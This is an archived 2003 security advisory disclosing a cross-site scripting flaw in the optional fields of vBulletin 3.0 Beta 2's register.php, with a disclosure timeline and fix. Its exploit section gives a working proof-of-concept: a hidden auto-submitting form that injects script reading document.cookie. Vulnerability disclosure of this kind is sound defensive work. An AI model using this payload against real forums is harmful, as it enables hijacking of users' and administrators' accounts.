vbulletin.txt

vbulletin.txt: Posted Aug 12, 2003; Authored by Ferruh Mavituna | Site ferruh.mavituna.com; VBulletin version 3.0 Beta 2 is susceptible to a cross site scripting vulnerability in its new member page (register.php).; tags | advisory, php, xss; SHA-256 | 82b507f123b10ff88ea31cb0f462ee386a7460f3528905be6623a60bcc1ae7b8; Download | Favorite | View

vbulletin.txt

------------------------------------------------------
VBulletin New Member XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility. With this vuln. an attacker could
access other users/admins accounts.
Online URL : http://ferruh.mavituna.com/article.asp?256

------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application

Vendor & Demo;
www.vbulletin.com

------------------------------------------------------
Description;
------------------------------------------------------
In new member page (register.php), If you skip a required field system
redirect you same form and fill fields automaticly that you enter before for
a better form. In standard fields Vbulletin successfully handle script
injections. But in optional fields like "Interests-Hobbies", "Biography",
"Occupation" etc...

So you can execute any JS with this fields.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0 Beta 2

------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.3.0
vBulletin 2.2.8 ...


------------------------------------------------------
Vendor Status;
------------------------------------------------------
No answer at the moment.

------------------------------------------------------
History
------------------------------------------------------
Discovered : 15.07.2003
Vendor Informed : 29.07.2003
Publihed : 06.08.2003

------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like other inputs is OK.

------------------------------------------------------
Exploit Code;
------------------------------------------------------
[form action="http://[victim]/register.php?do=register" method="post"
style="display:none"]
 [input type="hidden" name="s" value="" /]
 [input type="hidden" name="regtype" value="1" /]
 [input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" /]
 [input type="hidden" name="url" value="index.php" /]
 [input type="hidden" name="do" value="addmember" /]
[/form]
[script]
 //Code that will be executed
 var xss = "\"][script]alert(document"+".cookie)[\/script]";
 document.forms[0].field1.value=xss;
 document.forms[0].submit();
[/script]

*Replace ([],<>)

Ferruh Mavituna
ferruh@mavituna.com
http://ferruh.mavituna.com
Web Application Security Specialist

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

vbulletin.txt

vbulletin.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

vbulletin.txt

Share This

vbulletin.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems